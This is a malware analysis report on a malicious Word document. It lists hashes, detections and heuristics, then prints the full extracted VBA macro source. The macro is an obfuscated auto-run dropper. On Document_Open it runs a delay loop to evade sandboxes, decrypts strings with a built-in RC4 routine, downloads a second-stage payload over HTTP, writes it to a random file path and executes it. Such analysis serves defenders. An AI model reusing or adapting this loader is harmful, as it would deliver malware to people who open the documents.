Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 61523c959f5f096d…

MALICIOUS

Office (OOXML)

31.6 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-30
MD5: 8d7270e21f77798cc67ee1a526c3b0d0 SHA-1: 3e90404b1159d4c3d163a8d7d9c545144d519e8e SHA-256: 61523c959f5f096dc909c247ad8285620283d87f6be7482bb28b04fa708757ea
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an OOXML document containing a VBA project with an obfuscated auto-exec loader. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common lure for macro-based malware. The VBA script uses CreateObject to likely download and execute a second-stage payload, as indicated by the 'auto=Document_Open; exec=CreateObject' heuristic firing.

Heuristics 10

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set Gq8L = CreateObject(QWBvWSh3YknkoG(Chr(41) + Chr(126) + Chr(110) + Chr(184) + Chr(14) + Chr(240) + Chr(48) + Chr(45) + Chr(144) + Chr(179) + Chr(87) + Chr(203) + Chr(168) + Chr(177) + Chr(105) + Chr(205) + Chr(152), "PFpnwrLZI"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Gq8L = CreateObject(QWBvWSh3YknkoG(Chr(41) + Chr(126) + Chr(110) + Chr(184) + Chr(14) + Chr(240) + Chr(48) + Chr(45) + Chr(144) + Chr(179) + Chr(87) + Chr(203) + Chr(168) + Chr(177) + Chr(105) + Chr(205) + Chr(152), "PFpnwrLZI"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    MnXdZVAfkG = Environ(QWBvWSh3YknkoG(Chr(11) + Chr(229) + Chr(119) + Chr(169) + Chr(94) + Chr(84) + Chr(65), "XS4gWB1lj8C")) & "\" & HV3e9WvU & QWBvWSh3YknkoG(Chr(185) + Chr(197) + Chr(253) + Chr(156), "Qt0iNEaj0")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12418 bytes
SHA-256: 39280fb4b25e9aab28e63a7e8e1d770bfbbb580cf1635cd18098b280f76dba56
Detection
ClamAV: No threats found
Obfuscation or payload: likely
85 of 160 identifiers look randomly generated (e.g. 'BWNTcfznWW3LBQChDI4fHG3uK') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub TRwgqYscQ()
Dim OxFoDQW2MmVp As Long, IZuAs As Long
OxFoDQW2MmVp = 89
IZuAs = 38
If OxFoDQW2MmVp + IZuAs > 2 Then
IZuAs = OxFoDQW2MmVp + 93
Else
InputBox 53
End If
Dim MnXdZVAfkG As String, Gq8L As Object, USPBzu As Integer
Dim Lt6q As Long, HY3UInv1GnCxxaTL As Long
Lt6q = 11
HY3UInv1GnCxxaTL = 30
If Lt6q + HY3UInv1GnCxxaTL > 2 Then
HY3UInv1GnCxxaTL = Lt6q + 20
Else
InputBox 76
End If
MnXdZVAfkG = Environ(QWBvWSh3YknkoG(Chr(11) + Chr(229) + Chr(119) + Chr(169) + Chr(94) + Chr(84) + Chr(65), "XS4gWB1lj8C")) & "\" & HV3e9WvU & QWBvWSh3YknkoG(Chr(185) + Chr(197) + Chr(253) + Chr(156), "Qt0iNEaj0")
Dim FWRvsCSk As Long, PPhQABZYaYtBbt5C As Long
FWRvsCSk = 80
PPhQABZYaYtBbt5C = 93
If FWRvsCSk + PPhQABZYaYtBbt5C > 2 Then
PPhQABZYaYtBbt5C = FWRvsCSk + 8
Else
InputBox 39
End If
Set Gq8L = CreateObject(QWBvWSh3YknkoG(Chr(41) + Chr(126) + Chr(110) + Chr(184) + Chr(14) + Chr(240) + Chr(48) + Chr(45) + Chr(144) + Chr(179) + Chr(87) + Chr(203) + Chr(168) + Chr(177) + Chr(105) + Chr(205) + Chr(152), "PFpnwrLZI"))
Dim PVZ5PzyXnNB As Long, URS76aXRcDDEWF As Long
PVZ5PzyXnNB = 14
URS76aXRcDDEWF = 67
If PVZ5PzyXnNB + URS76aXRcDDEWF > 2 Then
URS76aXRcDDEWF = PVZ5PzyXnNB + 32
Else
InputBox 65
End If
Gq8L.Open QWBvWSh3YknkoG(Chr(144) + Chr(177) + Chr(47), "WGCEPjAmg"), QWBvWSh3YknkoG(Chr(186) + Chr(107) + Chr(2) + Chr(145) + Chr(97) + Chr(137) + Chr(94) + Chr(144) + Chr(1) + Chr(217) + Chr(86) + Chr(240) + Chr(24) + Chr(237) + Chr(5) + Chr(152) + Chr(57) + Chr(34) + Chr(199) + Chr(43) + Chr(30) + Chr(163) + Chr(76) + Chr(29) + Chr(115) + Chr(88) + Chr(215), "RBag6e7LaHR"), False
Dim UVnDF9 As Long, COxiEmaf1i As Long
UVnDF9 = 42
COxiEmaf1i = 9
If UVnDF9 + COxiEmaf1i > 2 Then
COxiEmaf1i = UVnDF9 + 8
Else
InputBox 83
End If
Gq8L.setRequestHeader QWBvWSh3YknkoG(Chr(227) + Chr(113) + Chr(128) + Chr(100) + Chr(163) + Chr(36) + Chr(119) + Chr(72) + Chr(45) + Chr(196), "IbkroMsTAoWX"), QWBvWSh3YknkoG(Chr(109) + Chr(16) + Chr(83) + Chr(147) + Chr(144) + Chr(59) + Chr(211) + Chr(239) + Chr(51) + Chr(157) + Chr(145), "MHEDVmhEPi")
Gq8L.send
If Gq8L.readyState = 4 And Gq8L.Status = 200 Then
Dim EFhdPhWW As Long, RvrGaU As Long
EFhdPhWW = 81
RvrGaU = 18
If EFhdPhWW + RvrGaU > 2 Then
RvrGaU = EFhdPhWW + 7
Else
InputBox 86
End If
USPBzu = FreeFile
Open MnXdZVAfkG For Binary Access Write Lock Write As #USPBzu
Put #USPBzu, , QWBvWSh3YknkoG(StrConv(Gq8L.ResponseBody, vbUnicode), QWBvWSh3YknkoG(Chr(4) + Chr(64) + Chr(98) + Chr(212) + Chr(104) + Chr(90) + Chr(172) + Chr(217) + Chr(124), "Ld3I4PqrY3UInv"))
Close #USPBzu
Dim CI64yyBfD6FDMG7oD As Long, VnNB28df9R1q As Long
CI64yyBfD6FDMG7oD = 55
VnNB28df9R1q = 94
If CI64yyBfD6FDMG7oD + VnNB28df9R1q > 2 Then
VnNB28df9R1q = CI64yyBfD6FDMG7oD + 50
Else
InputBox 58
End If
BqttvVBk8h3HNjs 1
Dim Dqpzk As Long, YqWJUtEq As Long
Dqpzk = 14
YqWJUtEq = 67
If Dqpzk + YqWJUtEq > 2 Then
YqWJUtEq = Dqpzk + 32
Else
InputBox 65
End If
CreateObject(QWBvWSh3YknkoG(Chr(108) + Chr(168) + Chr(223) + Chr(242) + Chr(24) + Chr(84) + Chr(246) + Chr(215) + Chr(252) + Chr(12) + Chr(235) + Chr(37) + Chr(145), "RHSLMS6NkUMNg5")).exec """" & MnXdZVAfkG & """"
Dim AUt As Long, SHymcTDeN6DI As Long
AUt = 13
SHymcTDeN6DI = 95
If AUt + SHymcTDeN6DI > 2 Then
SHymcTDeN6DI = AUt + 22
Else
InputBox 42
End If
End If
Dim BWNTcfznWW3LBQChDI4fHG3uK As Long, Xycwa As Long
BWNTcfznWW3LBQChDI4fHG3uK = 72
Xycwa = 18
If BWNTcfznWW3LBQChDI4fHG3uK + Xycwa > 2 Then
Xycwa = BWNTcfznWW3LBQChDI4fHG3uK + 81
Else
InputBox 38
End If
Set Gq8L = Nothing
Dim NL5jutekv9h3q4058 As Long, Q3Q As Long
NL5jutekv9h3q4058 = 90
Q3Q = 13
If NL5jutekv9h3q4058 + Q3Q > 2 Then
Q3Q = NL5jutekv9h3q4058 + 45
Else
InputBox 73
End If
End Sub
Sub Pv1qDv2zByGXkm()
Dim YI2biRhTioETNjgG As Long, AIouNp As Long
YI2biRhTioETNjgG = 13
AIouNp = 70
If YI2biRhTioETNjgG + AIouNp > 2 Then
AIouNp = YI2biRhTioETNjgG + 36
Else
InputBox 74
End If
QFQChDI4 = UCase(29)
P16LcX4hjoEQAt6 = QBColor(22)
EZWVJeVhVx = CurDir
Hour 44
A8wpdRMp8s7 = Dir("V2q2QWoNranB")
If CByte(77) = True Then TdtqOZ8ngb = 620
NPer 23, 41, 86
Randomize
Command
Month 76
Rnd
AppActivate 33
Load VKRfV
Tan 37
Err.Raise 12
Sqr 48
If CDbl(64) = True Then NFD5f4Flq8j = 44
DDB 5, 95, 96, 93
WeekdayName 3
Uv9h3q4058KK2yUf = CVErr(74)
Weekday 87
Px5LJsk = Day(1)
Loc 33
LVBVztz659 = Cos(10)
Year 84
Rate 82, 14, 94
ChDir 83
Second 32
BW3LS6VVc8SUL94 = CVDate(87)
ChDrive 47
Dim I2GQNZwN6igs As Long, ULpEQhjnGpQf6o As Long
I2GQNZwN6igs = 98
ULpEQhjnGpQf6o = 44
If I2GQNZwN6igs + ULpEQhjnGpQf6o > 2 Then
ULpEQhjnGpQf6o = I2GQNZwN6igs + 34
Else
InputBox 90
End If
End Sub
Sub BqttvVBk8h3HNjs(H8NsK3pArg1 As Long)
Dim P477AU0GR As Long, VGd450 As Long
P477AU0GR = 2
VGd450 = 10
If P477AU0GR + VGd450 > 2 Then
VGd450 = P477AU0GR + 37
Else
InputBox 57
End If
Dim K00ezW8aq As Long
Dim BTZIFrjWf As Long, H1kroTZ2bOwr2M As Long
BTZIFrjWf = 42
H1kroTZ2bOwr2M = 89
If BTZIFrjWf + H1kroTZ2bOwr2M > 2 Then
H1kroTZ2bOwr2M = BTZIFrjWf + 45
Else
InputBox 5
End If
K00ezW8aq = Timer + H8NsK3pArg1
Do While Timer < K00ezW8aq
DoEvents
Loop
Dim EXDRleH3dK As Long, LISy4hH477AU0G As Long
EXDRleH3dK = 18
LISy4hH477AU0G = 15
If EXDRleH3dK + LISy4hH477AU0G > 2 Then
LISy4hH477AU0G = EXDRleH3dK + 24
Else
InputBox 95
End If
End Sub
Sub Document_Open()
Dim HqsEa9jQi3tQee8xH As Long, HqsEa9jQi3tQee8x As Long
HqsEa9jQi3tQee8xH = 32
HqsEa9jQi3tQee8x = 45
If HqsEa9jQi3tQee8xH + HqsEa9jQi3tQee8x > 2 Then
HqsEa9jQi3tQee8x = HqsEa9jQi3tQee8xH + 59
Else
InputBox 90
End If
Dim AIadiTQ5j As Long, LDNg6fkiqGzM As Long, LP50aHYhXXnL5N As Long
Dim PcKOZpzA As Long, UmQjGrPwL As Long
PcKOZpzA = 65
UmQjGrPwL = 19
If PcKOZpzA + UmQjGrPwL > 2 Then
UmQjGrPwL = PcKOZpzA + 83
Else
InputBox 17
End If
AIadiTQ5j = 937461662: LDNg6fkiqGzM = 0: LP50aHYhXXnL5N = 0
Dim LSKcI27yFL2UYlsXv As Long, Rt2WC As Long
LSKcI27yFL2UYlsXv = 64
Rt2WC = 74
If LSKcI27yFL2UYlsXv + Rt2WC > 2 Then
Rt2WC = LSKcI27yFL2UYlsXv + 90
Else
InputBox 70
End If
For LDNg6fkiqGzM = 1 To AIadiTQ5j
LP50aHYhXXnL5N = LP50aHYhXXnL5N + 1
Next LDNg6fkiqGzM
Dim NMJVToaK As Long, J6R4TsZSP As Long
NMJVToaK = 96
J6R4TsZSP = 1
If NMJVToaK + J6R4TsZSP > 2 Then
J6R4TsZSP = NMJVToaK + 40
Else
InputBox 95
End If
If LP50aHYhXXnL5N = AIadiTQ5j Then
Dim ClAr2 As Long, WzVdgV As Long
ClAr2 = 36
WzVdgV = 35
If ClAr2 + WzVdgV > 2 Then
WzVdgV = ClAr2 + 65
Else
InputBox 46
End If
TRwgqYscQ
Dim C5bNDaWYAo As Long, MozFHmNgr As Long
C5bNDaWYAo = 63
MozFHmNgr = 52
If C5bNDaWYAo + MozFHmNgr > 2 Then
MozFHmNgr = C5bNDaWYAo + 32
Else
InputBox 92
End If
Else
Dim KKgx4DqVoNyGMb As Long, W9iLW0wfhvc As Long
KKgx4DqVoNyGMb = 22
W9iLW0wfhvc = 76
If KKgx4DqVoNyGMb + W9iLW0wfhvc > 2 Then
W9iLW0wfhvc = KKgx4DqVoNyGMb + 14
Else
InputBox 74
End If
Pv1qDv2zByGXkm
Dim QcAwTkz2nEXH7114 As Long, YjY5TEhn00 As Long
QcAwTkz2nEXH7114 = 53
YjY5TEhn00 = 57
If QcAwTkz2nEXH7114 + YjY5TEhn00 > 2 Then
YjY5TEhn00 = QcAwTkz2nEXH7114 + 20
Else
InputBox 58
End If
End If
Dim UxD9szkjym7Zo As Long, HBM39WvrXGLRe0ck As Long
UxD9szkjym7Zo = 20
HBM39WvrXGLRe0ck = 82
If UxD9szkjym7Zo + HBM39WvrXGLRe0ck > 2 Then
HBM39WvrXGLRe0ck = UxD9szkjym7Zo + 94
Else
InputBox 32
End If
End Sub
Function QWBvWSh3YknkoG(ByVal DELWteJixhJS As String, ByVal XMbbiTav3je As String) As String
Dim IYng7kXpv26yKnY As Long, YvHNBMw1jX As Long
IYng7kXpv26yKnY = 24
YvHNBMw1jX = 45
If IYng7kXpv26yKnY + YvHNBMw1jX > 2 Then
YvHNBMw1jX = IYng7kXpv26yKnY + 34
Else
InputBox 68
End If
On Error Resume Next
Dim LyrsVac7YvqeY3NYS As Long, NetTCh3l As Long
LyrsVac7YvqeY3NYS = 21
NetTCh3l = 79
If LyrsVac7YvqeY3NYS + NetTCh3l > 2 Then
NetTCh3l = LyrsVac7YvqeY3NYS + 5
Else
InputBox 3
End If
Dim VIgsWRK7(0 To 255) As Integer, IF5Dp9lu59uhK As Long, N57bIvNOLIesZo As Long, QTK6QUUMmaYtBbt5C As Long, VAipo() As Byte, R6ZXHc() As Byte, FiUMWNmutZ2J5 As Byte
Dim VUCk8QBHM As Long, L2wz As Long
VUCk8QBHM = 71
L2wz = 76
If VUCk8QBHM + L2wz > 2 Then
L2wz = VUCk8QBHM + 61
Else
InputBox 9
End If
VAipo() = StrConv(XMbbiTav3je, vbFromUnicode)
Dim TzS8Y As Long, GTeRlj9ORU9RjaJw As Long
TzS8Y = 52
GTeRlj9ORU9RjaJw = 62
If TzS8Y + GTeRlj9ORU9RjaJw > 2 Then
GTeRlj9ORU9RjaJw = TzS8Y + 77
Else
InputBox 57
End If
For IF5Dp9lu59uhK = 0 To 255
VIgsWRK7(IF5Dp9lu59uhK) = IF5Dp9lu59uhK
Next IF5Dp9lu59uhK
IF5Dp9lu59uhK = 0
N57bIvNOLIesZo = 0
QTK6QUUMmaYtBbt5C = 0
For IF5Dp9lu59uhK = 0 To 255
N57bIvNOLIesZo = (N57bIvNOLIesZo + VIgsWRK7(IF5Dp9lu59uhK) + VAipo(IF5Dp9lu59uhK Mod Len(XMbbiTav3je))) Mod 256
FiUMWNmutZ2J5 = VIgsWRK7(IF5Dp9lu59uhK)
VIgsWRK7(IF5Dp9lu59uhK) = VIgsWRK7(N57bIvNOLIesZo)
VIgsWRK7(N57bIvNOLIesZo) = FiUMWNmutZ2J5
Next IF5Dp9lu59uhK
IF5Dp9lu59uhK = 0
N57bIvNOLIesZo = 0
QTK6QUUMmaYtBbt5C = 0
R6ZXHc() = StrConv(DELWteJixhJS, vbFromUnicode)
For IF5Dp9lu59uhK = 0 To Len(DELWteJixhJS)
N57bIvNOLIesZo = (N57bIvNOLIesZo + 1) Mod 256
QTK6QUUMmaYtBbt5C = (QTK6QUUMmaYtBbt5C + VIgsWRK7(N57bIvNOLIesZo)) Mod 256
FiUMWNmutZ2J5 = VIgsWRK7(N57bIvNOLIesZo)
VIgsWRK7(N57bIvNOLIesZo) = VIgsWRK7(QTK6QUUMmaYtBbt5C)
VIgsWRK7(QTK6QUUMmaYtBbt5C) = FiUMWNmutZ2J5
R6ZXHc(IF5Dp9lu59uhK) = R6ZXHc(IF5Dp9lu59uhK) Xor (VIgsWRK7((VIgsWRK7(N57bIvNOLIesZo) + VIgsWRK7(QTK6QUUMmaYtBbt5C)) Mod 256))
Next IF5Dp9lu59uhK
Dim V65eGh1PJLceD2g As Long, UoVgXHothfB As Long
V65eGh1PJLceD2g = 94
UoVgXHothfB = 7
If V65eGh1PJLceD2g + UoVgXHothfB > 2 Then
UoVgXHothfB = V65eGh1PJLceD2g + 98
Else
InputBox 21
End If
QWBvWSh3YknkoG = StrConv(R6ZXHc, vbUnicode)
Dim Wt8U4qczwNp As Long, Ep9jIj As Long
Wt8U4qczwNp = 55
Ep9jIj = 52
If Wt8U4qczwNp + Ep9jIj > 2 Then
Ep9jIj = Wt8U4qczwNp + 7
Else
InputBox 71
End If
End Function
Function HV3e9WvU() As String
Dim PobfGBPLiM As Long, Ch0IfxWvhorbum As Long
PobfGBPLiM = 8
Ch0IfxWvhorbum = 68
If PobfGBPLiM + Ch0IfxWvhorbum > 2 Then
Ch0IfxWvhorbum = PobfGBPLiM + 14
Else
InputBox 48
End If
Dim WfHYkjIWjIE0() As Byte, KiQgG6keP() As Byte, C48mVqtVdmKCB As Long, ItUuG9HW3 As Long, QTK6QUUMmeBZRtot6 As String, TACbuI As String, C8Ure8 As Long
Dim JceDWrULXfPkFZnWP As Long, Hr64jxjA As Long
JceDWrULXfPkFZnWP = 88
Hr64jxjA = 26
If JceDWrULXfPkFZnWP + Hr64jxjA > 2 Then
Hr64jxjA = JceDWrULXfPkFZnWP + 41
Else
InputBox 21
End If
C8Ure8 = 0
Dim HSBq6WsPP2iaC As Long, OKpmyuWeoYAes7nx As Long
HSBq6WsPP2iaC = 7
OKpmyuWeoYAes7nx = 45
If HSBq6WsPP2iaC + OKpmyuWeoYAes7nx > 2 Then
OKpmyuWeoYAes7nx = HSBq6WsPP2iaC + 56
Else
InputBox 71
End If
Hl73mfhinnNZRU:
Dim Vt7sxYS9pyl As Long, YrUKYxzpPib As Long
Vt7sxYS9pyl = 47
YrUKYxzpPib = 49
If Vt7sxYS9pyl + YrUKYxzpPib > 2 Then
YrUKYxzpPib = Vt7sxYS9pyl + 90
Else
InputBox 93
End If
Randomize
TACbuI = Int(30 * Rnd)
If TACbuI < 4 Then GoTo Hl73mfhinnNZRU
C8Ure8 = TACbuI
If C8Ure8 > 0& Then
Dim BHYVvm4j76 As Long, UbmNNFX As Long
BHYVvm4j76 = 51
UbmNNFX = 12
If BHYVvm4j76 + UbmNNFX > 2 Then
UbmNNFX = BHYVvm4j76 + 29
Else
InputBox 30
End If
QTK6QUUMmeBZRtot6 = QWBvWSh3YknkoG(Chr(13) + Chr(251) + Chr(253) + Chr(104) + Chr(85) + Chr(137) + Chr(197) + Chr(146) + Chr(232) + Chr(18), "Fv0r")
Randomize
WfHYkjIWjIE0 = QTK6QUUMmeBZRtot6
C48mVqtVdmKCB = Len(QTK6QUUMmeBZRtot6) - 1&
C8Ure8 = (C8Ure8 * 2&) - 1&
ReDim KiQgG6keP(C8Ure8) As Byte
Dim Vj17tX7Ve1J7wCx As Long, QdGRx6i3vN As Long
Vj17tX7Ve1J7wCx = 55
QdGRx6i3vN = 98
If Vj17tX7Ve1J7wCx + QdGRx6i3vN > 2 Then
QdGRx6i3vN = Vj17tX7Ve1J7wCx + 67
Else
InputBox 88
End If
For ItUuG9HW3 = 0& To C8Ure8 Step 2&
KiQgG6keP(ItUuG9HW3) = WfHYkjIWjIE0(CLng(C48mVqtVdmKCB * Rnd) * 2&)
Next
Dim OObl24o As Long, IwU8JYl As Long
OObl24o = 36
IwU8JYl = 29
If OObl24o + IwU8JYl > 2 Then
IwU8JYl = OObl24o + 51
Else
InputBox 84
End If
End If
Dim FhchJnUMY As Long, SfMYJh As Long
FhchJnUMY = 27
SfMYJh = 58
If FhchJnUMY + SfMYJh > 2 Then
SfMYJh = FhchJnUMY + 65
Else
InputBox 70
End If
HV3e9WvU = KiQgG6keP
Dim UVmEIQ As Long, JOwjHJwk1h As Long
UVmEIQ = 43
JOwjHJwk1h = 10
If UVmEIQ + JOwjHJwk1h > 2 Then
JOwjHJwk1h = UVmEIQ + 36
Else
InputBox 84
End If
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: 0adc8bc5d7e27b66530243fee8a955c260de5b3a35a085775e2edc720b70eea1
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.